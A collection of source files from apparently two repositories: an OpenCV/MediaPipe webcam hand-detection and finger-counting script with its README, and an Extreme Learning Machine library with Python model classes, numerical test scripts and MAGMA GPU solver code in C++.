if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
<file_sep>7# -*- coding: utf-8 -*-
"""
Created on Sun May 2 00:18:16 2021
@author: vrush
"""
import cv2
import mediapipe as mp
import time
mp_hands = mp.solutions.hands
previous_time = 0
current_time = 0
vid = cv2.VideoCapture(0)
hands = mp_hands.Hands()
mp_draw= mp.solutions.drawing_utils
while(True):
success, img = vid.read()
img_RGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = hands.process(img_RGB)
print(results.multi_hand_landmarks)
if results.multi_hand_landmarks:
for hand_marks in results.multi_hand_landmarks:
for id, land_mark in enumerate(hand_marks.landmark):
#print(id, land_mark)
h,w,c = img.shape
center_x, center_y = int(land_mark.x*w), int(land_mark.y*h)
print(id, center_x,center_y)
#if id ==0:
cv2.circle(img, (center_x,center_y), 4, (255,55,55), cv2.FILLED)
mp_draw.draw_landmarks(img,hand_marks, mp_hands.HAND_CONNECTIONS )
current_time= time.time()
fps = 1/ (current_time - previous_time)
previous_time = current_time
cv2.putText(img, str(int(fps)), (10,70), cv2.FONT_HERSHEY_PLAIN, 3, (200,0,0),3)
cv2.imshow("Image",img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
<file_sep># Hand-Detection
The project contains the code of hand detection. The model has used a model named as hand. The project doesn't need any GPU to be used. The entire detection part is done with help of OpenCV2. The OpenCV2 identifies the hand and the model has 20 numbers placed at the number of positions on the hand. The model tells the joints of the hand. Then I have opened an image on the screen by using python and the images were named with numbers 0 to 6. By using OpenCV2 and simple prediction code. The predication were made between the hand numbers and image numbers. The hand shows the figure and cv2 by simple prediction shows the image.
<file_sep>import time
import mediapipe as mp
import os
import cv2
class handDetector():
def __init__(self,mode=False,is_authenticated=True,maxHands=2,detection_confidence=0.5,tracking_confidence=0.5):
self.mode = mode
self.maxHands = maxHands
self.detection_confidence= detection_confidence
self.tracking_confidence = tracking_confidence
self.mp_hands = mp.solutions.hands
self.hands = self.mp_hands.Hands(self.mode,self.maxHands,self.detection_confidence,self.tracking_confidence)
self.mp_draw= mp.solutions.drawing_utils
def Find_hands(self, img, draw=True):
img_RGB = cv2.cvtColor( img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(img_RGB)
if self.results.multi_hand_landmarks:
for hand_marks in self.results.multi_hand_landmarks:
if draw:
self.mp_draw.draw_landmarks(img,hand_marks, self.mp_hands.HAND_CONNECTIONS )
return img
def Find_position(self, img, hand_no = 0, draw= True):
self.land_mark_list =[]
if self.results.multi_hand_landmarks:
my_hand = self.results.multi_hand_landmarks[hand_no]
for id, land_mark in enumerate(my_hand.landmark):
h,w,c = img.shape
center_x, center_y = int(land_mark.x*w), int(land_mark.y*h)
self.land_mark_list.append([id , center_x, center_y])
if draw:
cv2.circle(img, (center_x,center_y), 5, (255,55,55), cv2.FILLED)
return self.land_mark_list
wCam , hCam = 640, 480
cap = cv2.VideoCapture(0)
cap.set(3, wCam)
cap.set(4, hCam)
folder_path = "nu"
my_list = os.listdir(folder_path)
print(my_list)
over_lay_list=[]
for img_path in my_list:
image = cv2.imread(f'{folder_path}/{img_path}')
print(f'{folder_path}/{img_path}')
over_lay_list.append(image)
print(len(over_lay_list))
print(len(over_lay_list))
previous_time = 0
detector = handDetector(detection_confidence=0.5)
Tip_IDS= [4, 8,12, 16,20]
while True:
success, img = cap.read()
img = detector.Find_hands(img)
landmark_List = detector.Find_position(img,draw = False)
if len(landmark_List)!=0 :
Figures = []
#thumb
if landmark_List[Tip_IDS[0]][1]>landmark_List[Tip_IDS[0]-1][1]:
Figures.append(1)
else :
Figures.append(0)
#for 4 fing
for id in range(1,5):
if landmark_List[Tip_IDS[id]][2]<landmark_List[Tip_IDS[id]-2][2]:
Figures.append(1)
else :
Figures.append(0)
total_figure= Figures.count(1)
print(total_figure)
h, w, c = over_lay_list[total_figure-0].shape
img[0:h,0:w]=over_lay_list[total_figure-0]
cv2.rectangle(img,(20,225),(170,425),(0,255,0),cv2.FILLED)
cv2.putText(img, str(total_figure), (45,375), cv2.FONT_HERSHEY_PLAIN,10,(255,89,45),25)
current_time = time.time()
fps = 1 / (current_time-previous_time)
previous_time = current_time
cv2.putText(img, f'FPS: {int(fps)}',(400, 55), cv2.FONT_HERSHEY_PLAIN , 3, (255,12,12),3)
cv2.imshow("Image",img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.destroyAllWindows() | c8850cbbe7f92088bff571c82e93c750384437d8 | [
"Markdown",
"Python"
] | 4 | Python | vrushankdhande/Hand-Detection- | df6aa8c1a8e5d6c90ee20a08d31875c5af277bea | 65f52aa7a9f2cb6aad211e264c20244d838795d7 |
refs/heads/master | <file_sep>#!/bin/bash
#$ -q AL
#$ -pe smp 1
OMP_NUM_THREADS=1 python /Users/akusok/Dropbox/Documents/X-ELM/hpelm/datasets/benchmark.py $1
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
import numexpr as ne
from tables import open_file
from scipy.spatial.distance import cdist
from scipy.linalg import solve as cpu_solve
from multiprocessing import Pool, cpu_count
import cPickle
import os, platform
def cd(a):
x, w, kind, idx = a
return cdist(x, w, kind)**2, idx
class SLFN(object):
"""Single-hidden Layer Feed-forward Network.
"""
def __init__(self, inputs, targets, batch=100, accelerator=""):
"""Initializes a SLFN with an empty hidden layer.
:param inputs: number of features in input samples (input dimensionality)
:param outputs: number of simultaneous predicted outputs
"""
assert isinstance(inputs, (int, long)), "Number of inputs must be integer"
assert isinstance(targets, (int, long)), "Number of outputs must be integer"
assert batch > 0, "Batch should be positive"
self.inputs = inputs
self.targets = targets
# cannot use a dictionary for neurons, because its iteration order is not defined
self.neurons = [] # list of all neurons with their types (= transformantion functions)
self.Beta = None
self.flist = ("lin", "sigm", "tanh", "rbf_l1", "rbf_l2", "rbf_linf")
self.alpha = 1E-9 # normalization for H'H solution
self.batch = int(batch) # smallest batch for batch processing
self.accelerator = None # None, "GPU", "PHI"
if accelerator == "GPU":
self.accelerator = "GPU"
self.magma_solver = __import__('acc.gpu_solver', globals(), locals(), ['gpu_solve'], -1)
print "using GPU"
# init other stuff
self.opened_hdf5 = []
self.classification = None # c / wc / mc
self.weights_wc = None
self.tprint = 5
def __del__(self):
"""Close HDF5 files opened during HPELM usage.
"""
if len(self.opened_hdf5) > 0:
for h5 in self.opened_hdf5:
h5.close()
def _checkdata(self, X, T):
"""Checks data variables and fixes matrix dimensionality issues.
"""
if X is not None:
if isinstance(X, basestring): # open HDF5 file
try:
h5 = open_file(X, "r")
self.opened_hdf5.append(h5)
for node in h5.walk_nodes():
pass # find a node with whatever name
X = node
except:
raise IOError("Cannot read HDF5 file at %s" % X)
else:
# assert isinstance(X, np.ndarray) and X.dtype.kind not in "OSU", "X must be a numerical numpy array"
if len(X.shape) == 1:
X = X.reshape(-1, 1)
assert len(X.shape) == 2, "X must have 2 dimensions"
assert X.shape[1] == self.inputs, "X has wrong dimensionality: expected %d, found %d" % (self.inputs, X.shape[1])
if T is not None:
if isinstance(T, basestring): # open HDF5 file
try:
h5 = open_file(T, "r")
self.opened_hdf5.append(h5)
for node in h5.walk_nodes():
pass # find a node with whatever name
T = node
except:
raise IOError("Cannot read HDF5 file at %s" % T)
else:
# assert isinstance(T, np.ndarray) and T.dtype.kind not in "OSU", "T must be a numerical numpy array"
if len(T.shape) == 1:
T = T.reshape(-1, 1)
assert len(T.shape) == 2, "T must have 2 dimensions"
assert T.shape[1] == self.targets, "T has wrong dimensionality: expected %d, found %d" % (self.targets, T.shape[1])
if (X is not None) and (T is not None):
assert X.shape[0] == T.shape[0], "X and T cannot have different number of samples"
return X, T
def add_neurons(self, number, func, W=None, B=None):
"""Add neurons of a specific type to the SLFN.
If neurons of such type exist, merges them together.
:param number: - number of neurons to add
:param func: - transformation function of those neurons,
"lin", "sigm", "tanh", "rbf_l1", "rbf_l2", "rbf_linf"
or a custom function of type <numpy.ufunc>
:param W: - projection matrix or ("rbf_xx") a list of centroids
:param B: - bias vector or ("rbf_xx") a vector of sigmas
"""
assert isinstance(number, int), "Number of neurons must be integer"
assert func in self.flist or isinstance(func, np.ufunc), "Use standard neuron function or a custom <numpy.ufunc>"
assert isinstance(W, (np.ndarray, type(None))), "Projection matrix (W) must be a Numpy ndarray"
assert isinstance(B, (np.ndarray, type(None))), "Bias vector (B) must be a Numpy ndarray"
# initialize skipped arguments
if W is None:
if func == "lin": # copying input features for linear neurons
number = min(number, self.inputs) # cannot have more linear neurons than features
W = np.eye(self.inputs, number)
else:
W = np.random.randn(self.inputs, number)
if func not in ("rbf_l1", "rbf_l2", "rbf_linf"):
W = W * (3 / self.inputs ** 0.5) # high dimensionality fix
if B is None:
B = np.random.randn(number)
if func in ("rbf_l2", "rbf_l1", "rbf_linf"):
B = np.abs(B)
B = B * self.inputs
if func == "lin":
B = np.zeros((number,))
assert W.shape == (self.inputs, number), "W must be size [inputs, neurons] (expected [%d,%d])" % (self.inputs, number)
assert B.shape == (number,), "B must be size [neurons] (expected [%d])" % number
ntypes = [nr[0] for nr in self.neurons] # existing types of neurons
if func in ntypes:
# add to an existing neuron type
i = ntypes.index(func)
_, nn0, W0, B0 = self.neurons[i]
number = nn0 + number
W = np.hstack((W0, W))
B = np.hstack((B0, B))
self.neurons[i] = (func, number, W, B)
else:
# create a new neuron type
self.neurons.append((func, number, W, B))
self.Beta = None # need to re-train network after adding neurons
def project(self, X):
# assemble hidden layer output with all kinds of neurons
assert len(self.neurons) > 0, "Model must have hidden neurons"
X, _ = self._checkdata(X, None)
H = []
cdkinds = {"rbf_l2": "euclidean", "rbf_l1": "cityblock", "rbf_linf": "chebyshev"}
for func, _, W, B in self.neurons:
# projection
if "rbf" in func:
self._affinityfix()
N = X.shape[0]
k = cpu_count()
jobs = [(X[idx], W.T, cdkinds[func], idx) for idx in np.array_split(np.arange(N), k*10)] #### ERROR HERE!!!
p = Pool(k)
H0 = np.empty((N, W.shape[1]))
for h0, idx in p.imap(cd, jobs):
H0[idx] = h0
p.close()
H0 = - H0 / B
# if func == "rbf_l2":
# H0 = - cdist(X, W.T, "euclidean")**2 / B
# elif func == "rbf_l1":
# H0 = - cdist(X, W.T, "cityblock")**2 / B
# elif func == "rbf_linf":
# H0 = - cdist(X, W.T, "chebyshev")**2 / B
else:
H0 = X.dot(W) + B
# transformation
if func == "lin":
pass
elif "rbf" in func:
ne.evaluate('exp(H0)', out=H0)
elif func == "sigm":
ne.evaluate("1/(1+exp(-H0))", out=H0)
elif func == "tanh":
ne.evaluate('tanh(H0)', out=H0)
else:
H0 = func(H0) # custom <numpy.ufunc>
H.append(H0)
if len(H) == 1:
H = H[0]
else:
H = np.hstack(H)
# print (H > 0.01).sum(0)
return H
def predict(self, X):
"""Predict targets for the given inputs X.
:param X: - model inputs
"""
assert self.Beta is not None, "Train ELM before predicting"
H = self.project(X)
Y = H.dot(self.Beta)
return Y
def error(self, Y, T):
"""Calculate error of model predictions.
"""
_, Y = self._checkdata(None, Y)
_, T = self._checkdata(None, T)
return self._error(Y, T)
def confusion(self, Y1, T1):
"""Compute confusion matrix for the given classification, iteratively.
"""
_, Y = self._checkdata(None, Y1)
_, T = self._checkdata(None, T1)
nn = np.sum([n1[1] for n1 in self.neurons])
N = T.shape[0]
batch = max(self.batch, nn)
nb = int(np.ceil(float(N) / self.batch)) # number of batches
C = self.targets
conf = np.zeros((C, C))
if self.classification in ("c", "wc"):
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop]).argmax(1)
Yb = np.array(Y[start:stop]).argmax(1)
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.sum((Tb == c1) * (Yb == c1h))
elif self.classification == "mc":
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop]) > 0.5
Yb = np.array(Y[start:stop]) > 0.5
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.sum(Tb[:, c1] * Yb[:, c1h])
else: # No confusion matrix
conf = None
return conf
######################
### helper methods ###
def _prune(self, idx):
"""Leave only neurons with the given indexes.
"""
idx = list(idx)
neurons = []
for nold in self.neurons:
k = nold[1] # number of neurons
ix1 = [i for i in idx if i < k] # index for current neuron type
idx = [i-k for i in idx if i >= k]
func = nold[0]
number = len(ix1)
W = nold[2][:, ix1]
bias = nold[3][ix1]
neurons.append((func, number, W, bias))
self.neurons = neurons
def _ranking(self, nn):
"""Returns a random ranking of hidden neurons.
"""
rank = np.arange(nn)
np.random.shuffle(rank)
return rank, nn
def _solve_corr(self, HH, HT):
"""Solve a linear system from correlation matrices.
"""
if self.accelerator == "GPU":
Beta = self.magma_solver.gpu_solve(HH, HT, self.alpha)
else:
Beta = cpu_solve(HH, HT, sym_pos=True)
return Beta
def _error(self, Y, T, R=None):
"""Returns regression/classification/multiclass error, also for PRESS.
"""
raise NotImplementedError("SLFN does not know the use case to compute an error")
def _train(self, X, T):
raise NotImplementedError("SLFN does not know the use case to train a network")
def __str__(self):
s = "SLFN with %d inputs and %d outputs\n" % (self.inputs, self.targets)
s += "Hidden layer neurons: "
for func, n, _, _ in self.neurons:
s += "%d %s, " % (n, func)
s = s[:-2]
return s
def _affinityfix(self):
# Numpy processor affinity fix
if "Linux" in platform.system():
a = np.random.rand(3, 1)
np.dot(a.T, a)
pid = os.getpid()
os.system("taskset -p 0xffffffff %d >/dev/null" % pid)
def save(self, fname):
assert isinstance(fname, basestring), "Model file name must be a string"
m = {"inputs": self.inputs,
"outputs": self.targets,
"neurons": self.neurons,
"Beta": self.Beta,
"alpha": self.alpha,
"Classification": self.classification,
"Weights_WC": self.weights_wc}
try:
cPickle.dump(m, open(fname, "wb"), -1)
except IOError:
raise IOError("Cannot create a model file at: %s" % fname)
def load(self, fname):
assert isinstance(fname, basestring), "Model file name must be a string"
try:
m = cPickle.load(open(fname, "rb"))
except IOError:
raise IOError("Model file not found: %s" % fname)
self.inputs = m["inputs"]
self.targets = m["outputs"]
self.neurons = m["neurons"]
self.Beta = m["Beta"]
self.alpha = m["alpha"]
self.classification = m["Classification"]
self.weights_wc = m["Weights_WC"]
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 18:18:35 2015
@author: akusok
"""
import numpy as np
from numpy.linalg import pinv, inv, norm
from numpy import dot
def prepare():
N = 125
nn = 5
o = 2
H = np.random.randn(N, nn)
W = np.random.randn(nn, o)
T = dot(H,W) + np.random.randn(N,o)*(0.01/6)
return H, T
@profile
def runall(H,T):
_ = inv(H.T.dot(H))
B = run1(H,T)
B1 = run2(H,T)
return B, B1
@profile
def run1(H,T):
# basic
HH = H.T.dot(H)
HT = H.T.dot(T)
P = inv(HH)
B = P.dot(HT)
return B
@profile
def run2(H,T):
# OS
j = 5
H0 = H[:-j]
H1 = H[-j:]
T0 = T[:-j]
T1 = T[-j:]
K0 = dot(H0.T, H0)
P0 = inv(K0)
a = inv(np.eye(j) + H1.dot(P0).dot(H1.T))
P1 = P0 - P0.dot(H1.T).dot(a).dot(H1).dot(P0)
B0 = P0.dot(H0.T.dot(T0))
B1 = B0 + P1.dot(H1.T.dot(T1) - H1.T.dot(H1).dot(B0))
return B1
h,t = prepare()
b,b1 = runall(h,t)
print norm(b-b1)
print "Done"
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include "magma.h"
class GpuSolver {
int n, nrhs;
magmaDouble_ptr dA=NULL, dB=NULL;
magma_queue_t queue;
public:
GpuSolver( int, int, magmaDouble_ptr A, magmaDouble_ptr B );
void add_data( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T );
void get_corr( magmaDouble_ptr XX, magmaDouble_ptr XT );
void solve( magmaDouble_ptr X );
void finalize();
};
// init a zero matrix on GPU to store X'*X, add normalization
GpuSolver::GpuSolver ( int nn, int outs, magmaDouble_ptr A, magmaDouble_ptr B ) {
magma_int_t err;
magma_int_t num = 0;
magma_device_t device;
magma_init();
err = magma_get_devices( &device, 1, &num );
if ( err != MAGMA_SUCCESS or num < 1 ) {
fprintf( stderr, "magma_get_devices failed: %d\n", (int) err );
exit(-1);
}
err = magma_queue_create( device, &queue );
if ( err != MAGMA_SUCCESS ) {
fprintf( stderr, "magma_queue_create failed: %d\n", (int) err );
exit(-1);
}
n = nn;
nrhs = outs;
magma_dmalloc( &dA, n*n );
magma_dmalloc( &dB, n*nrhs );
if ( dA == NULL || dB == NULL ) { fprintf( stderr, "malloc failed - not enough GPU memory?\n" ); }
magma_dsetmatrix( n, n, A, 0, n, dA, 0, n, queue );
magma_dsetmatrix( n, nrhs, B, 0, n, dB, 0, n, queue );
};
// update covariance matrices with new data
void GpuSolver::add_data ( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T ) {
real_Double_t time;
magmaDouble_ptr dX=NULL, dT=NULL;
magma_dmalloc( &dX, m*n );
magma_dmalloc( &dT, m*nrhs );
if ( dX == NULL || dT == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
goto cleanup;
}
magma_dsetmatrix( m, n, X, 0, m, dX, 0, m, queue );
magma_dsetmatrix( m, nrhs, T, 0, m, dT, 0, m, queue );
// time = magma_sync_wtime( NULL );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, nrhs, m,
1, dX, 0, m,
dT, 0, m,
1, dB, 0, n, queue );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, n, m,
1, dX, 0, m,
dX, 0, m,
1, dA, 0, n, queue );
// time = magma_sync_wtime( NULL ) - time;
// fprintf( stdout, "added data in %f sec\n", time );
cleanup:
magma_free( dX );
magma_free( dT );
};
// return current covariance matrices
void GpuSolver::get_corr ( magmaDouble_ptr XX, magmaDouble_ptr XT ) {
magma_dgetmatrix( n, n, dA, 0, n, XX, 0, n, queue );
magma_dgetmatrix( n, nrhs, dB, 0, n, XT, 0, n, queue );
};
// free memory
void GpuSolver::finalize( ) {
magma_free( dA );
magma_free( dB );
magma_finalize();
}
// Solve dA * dX = dB, where dA and dX are stored in GPU device memory.
// Internally, MAGMA uses a hybrid CPU + GPU algorithm.
void GpuSolver::solve( magmaDouble_ptr X )
{
//real_Double_t gpu_time;
//magmaDouble_ptr dX=NULL, dWORKD=NULL;
//float *dWORKS=NULL;
magma_int_t qrsv_iters;
magma_int_t info = 0;
//magma_dmalloc( &dX, n*nrhs );
//magma_dmalloc( &dWORKD, n*nrhs );
//magma_smalloc( &dWORKS, n*(n+nrhs) );
//if ( dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
// fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
// goto cleanup;
//}
// gpu_time = magma_wtime();
magma_dsposv_mic( MagmaUpper, n, nrhs,
dA, 0, n, dB, 0, n,
&info, queue );
// gpu_time = magma_wtime() - gpu_time;
// fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%d\n", info ); }
magma_dgetmatrix( n, nrhs, dB, 0, n, X, 0, n, queue );
//cleanup:
//magma_free( dX );
//magma_free( dWORKD );
//magma_free( dWORKS );
}
// ------------------------------------------------------------
// ------------------------------------------------------------
// Independent solver for dA * dX = dB, where dA and dX are stored in GPU device memory.
// Internally, MAGMA uses a hybrid CPU + GPU algorithm.
//void solve_corr( magma_int_t n, magma_int_t nrhs, magmaDouble_ptr A, magmaDouble_ptr B, magmaDouble_ptr X )
//{
// magma_init();
//
// real_Double_t gpu_time;
// magmaDouble_ptr dA=NULL, dB=NULL, dX=NULL, dWORKD=NULL;
// float *dWORKS=NULL;
// magma_int_t qrsv_iters;
// magma_int_t info = 0;
//
// magma_dmalloc( &dA, n*n );
// magma_dmalloc( &dB, n*nrhs );
// magma_dmalloc( &dX, n*nrhs );
// magma_dmalloc( &dWORKD, n*nrhs );
// magma_smalloc( &dWORKS, n*(n+nrhs) );
// if ( dA == NULL || dB == NULL || dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
// fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
// goto cleanup;
// }
//
// // send data to GPU (round n to ldda)
// magma_dsetmatrix( n, n, A, n, dA, n );
// magma_dsetmatrix( n, nrhs, B, n, dB, n );
//
// gpu_time = magma_wtime();
// magma_dsposv_gpu( MagmaUpper, n, nrhs,
// dA, n, dB, n, dX, n,
// dWORKD, dWORKS, &qrsv_iters, &info );
// gpu_time = magma_wtime() - gpu_time;
// fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
// if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
// if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%d\n", info ); }
//
// magma_dgetmatrix( n, nrhs, dX, n, X, n );
//
//cleanup:
// magma_free( dA );
// magma_free( dB );
// magma_free( dX );
// magma_free( dWORKD );
// magma_free( dWORKS );
// magma_finalize();
//}
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Nov 3 17:01:02 2014
@author: akusok
"""
import numpy as np
n = 12
d = 6
nn = 5
X1 = np.random.randint(200,255,size=(n,d/3))
X2 = np.random.randint(0,255,size=(n,d/3))
X3 = np.random.randint(1,5,size=(n,d/3))
X = np.hstack((X1,X2,X3))
#print X
mean = X.mean(0)
std = X.std(0)
W = np.random.randn(d,nn) / d**0.5
W = W / std.reshape(-1,1)
bias = -np.dot(W.T, mean)
H = X.dot(W) + bias
print H
print H.std()
print ((np.abs(H) < 5)*(np.abs(H)>0.2)).astype(np.int)
"""
from matplotlib import pyplot as plt
a = np.linspace(-5,5,10000)
b = np.tanh(a)
plt.plot(a,b,'-r')
plt.show()
"""<file_sep> # -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from numpy.linalg import lstsq
from .data_loader import batchX, batchT, c_dictT, decode
from .regularizations import semi_Tikhonov
from .error_functions import press
from .mrsr import mrsr
from .mrsr2 import mrsr2
from .elm import ELM
class ELM_SMALL(ELM):
"""Single-machine Extreme Learning Machine with model selection.
"""
def __init__(self, *args):
"""Create ELM of desired kind.
"""
super(ELM_SMALL, self).__init__(*args)
self.batch = -1 # batch < 0 means no batch processing
def project(self, X, delimiter=" "):
"""Projects inputs to a hidden layer.
"""
X, self.inputs, N = batchX(X, self.batch, delimiter)
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
return H
def train(self, X, T, delimiter=" ", neurons=[]):
"""Trains ELM, can use any X and T(=Y), and specify neurons.
Neurons: (number, type, [W], [B])
"""
# get data
if self.classification:
self.C_dict = c_dictT(T, self.batch)
X, self.inputs, N = batchX(X, self.batch, delimiter)
T, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# get parameters of new data and add neurons
self.Xmean = X.mean(0)
self.Xstd = X.std(0)
# get mean value of targets
if self.classification or self.multiclass:
self.Tmean = np.zeros((self.targets,)) # for any classification
else:
self.Tmean = T.mean(0)
self.add_neurons(neurons, N)
# project data
nn = len(self.ufunc)
HH = np.zeros((nn, nn))
HT = np.zeros((nn, self.targets))
# get hidden layer outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T = semi_Tikhonov(H,T, self.Tmean) # add Tikhonov regularization
# least squares solution - multiply both sides by H'
p = float(X.shape[0]) / N
HH += np.dot(H.T, H)*p
HT += np.dot(H.T, T)*p
# solve ELM model
HH += self.cI * np.eye(nn) # enhance solution stability
self.B = lstsq(HH, HT)[0]
#self.B = np.linalg.pinv(HH).dot(HT)
def predict(self, X, delimiter=" "):
"""Get predictions using a trained or loaded ELM model.
:param X: input data
:rtype: predictions Th
"""
assert self.B is not None, "train this model first"
X, inputs, _ = batchX(X, self.batch, delimiter)
assert self.inputs == inputs, "incorrect dimensionality of inputs"
# project test inputs to outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
Th = H.dot(self.B)
# additional processing for classification
if self.classification:
Th = decode(Th, self.C_dict)
return Th
def loo_press(self, X, Y, delimiter=" "):
"""PRESS (Predictive REsidual Summ of Squares) error.
Trick is to never calculate full HPH' matrix.
"""
MSE = 0
X, _, N = batchX(X, self.batch, delimiter)
T, _ = batchT(Y, self.batch, delimiter, self.C_dict)
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
MSE = press(H, T, self.classification, self.multiclass)
return MSE
def prune_op(self, X, T, delimiter=" "):
"""Prune ELM as in OP-ELM paper.
"""
# get data iterators
X, self.inputs, N = batchX(X, self.batch, delimiter)
T, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
# get hidden layer outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T = semi_Tikhonov(H,T,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
rank = mrsr(H, T, nn)
# select best number of neurons
MSE = press(H[:, rank[:2]], T, self.classification, self.multiclass)
R_opt = rank[:2]
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
r = rank[:i]
mse1 = press(H[:,r], T, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = r
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
# update ELM parameters and re-calculate B
self.W = self.W[:,R_opt]
self.ufunc = [self.ufunc[j] for j in R_opt]
self.train(X, T)
def prune_op2(self, X, T, norm=1, delimiter=" "):
"""Prune ELM with a more recent implementation of MRSR.
:param norm: - check numpy.linalg.norm(X, <norm>)
"""
# get data iterators
X, self.inputs, N = batchX(X, self.batch, delimiter)
T, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
# get hidden layer outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T = semi_Tikhonov(H,T,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
# this MRSR2 is a class, with <.rank> attribute and <.new_input()> method
M = mrsr2(H, T, norm)
M.new_input()
M.new_input()
# select best number of neurons
MSE = press(H[:, M.rank], T, self.classification, self.multiclass)
R_opt = M.rank
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
M.new_input()
mse1 = press(H[:, M.rank], T, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = M.rank
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
del M
# update ELM parameters and re-calculate B
self.W = self.W[:,R_opt]
self.ufunc = [self.ufunc[j] for j in R_opt]
self.train(X, T)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Nov 5 19:30:23 2014
@author: akusok
"""
import numpy as np
a = [["a","a","b","c","c"],["c","a","a","a","a"]]
b = np.random.randint(0,3,size=(10,5))
dictA = {"a":0, "b":1, "c":2}
vA = np.vectorize(lambda x : dictA[x])
#print vA(a)
dictB = {0:10, 1:20, 2:30}
vB = np.vectorize(lambda x : dictB[x])
#print vB(b)
decode = {n: l for l,n in dictA.items()}
vD = np.vectorize(lambda x : decode[x])
#print vD(b)
####################################################
print "final test"
f = np.random.randint(0,3,size=(12,))
f = vD(f)
print "f: ", f
C = len(set(f))
Cval = list(set(f))
temp = np.eye(C)
dictF = {Cval[i] : temp[i] for i in range(C)}
def vF(data):
return np.vstack([dictF[val] for val in data])
print vF(f)
f2 = np.array([[1,0,0],
[0,1,0],
[0,0,1]])
un_dictF = {np.argmax(v): k for k,v in dictF.items()}
def un_vF(data):
return [un_dictF[i] for i in np.argmax(data, 1)]
print un_vF(f2)
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include "magma.h"
class GpuSolver {
int n, nrhs;
magmaDouble_ptr dA=NULL, dB=NULL;
public:
GpuSolver( int, int );
~GpuSolver(){
magma_free( dA );
magma_free( dB );
magma_finalize();
};
void add_data( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T );
void solve( magmaDouble_ptr X );
};
// init a zero matrix on GPU to store X'*X
GpuSolver::GpuSolver ( int nn, int outs ) {
magma_init();
n = nn;
nrhs = outs;
magma_int_t i, j;
magmaDouble_ptr A=NULL, B=NULL;
magma_dmalloc_cpu( &A, n*n );
magma_dmalloc_cpu( &B, n*nrhs );
magma_dmalloc( &dA, n*n );
magma_dmalloc( &dB, n*nrhs );
if ( dA == NULL || dB == NULL || A == NULL || B == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU or system memory?\n" );
goto cleanup;
}
for( j=0; j < n; ++j ) {
for( i=0; i < n; ++i ) { A[i + j*n] = 0; }
}
for( j=0; j < nrhs; ++j ) {
for( i=0; i < n; ++i ) { B[i + j*n] = 0; }
}
magma_dsetmatrix( n, n, A, n, dA, n );
magma_dsetmatrix( n, nrhs, B, n, dB, n );
cleanup:
magma_free_cpu( A );
magma_free_cpu( B );
};
// init a zero matrix on GPU to store X'*X
void GpuSolver::add_data ( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T ) {
real_Double_t time;
magmaDouble_ptr dX=NULL, dT=NULL;
magma_dmalloc( &dX, m*n );
magma_dmalloc( &dT, m*nrhs );
if ( dX == NULL || dT == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU or system memory?\n" );
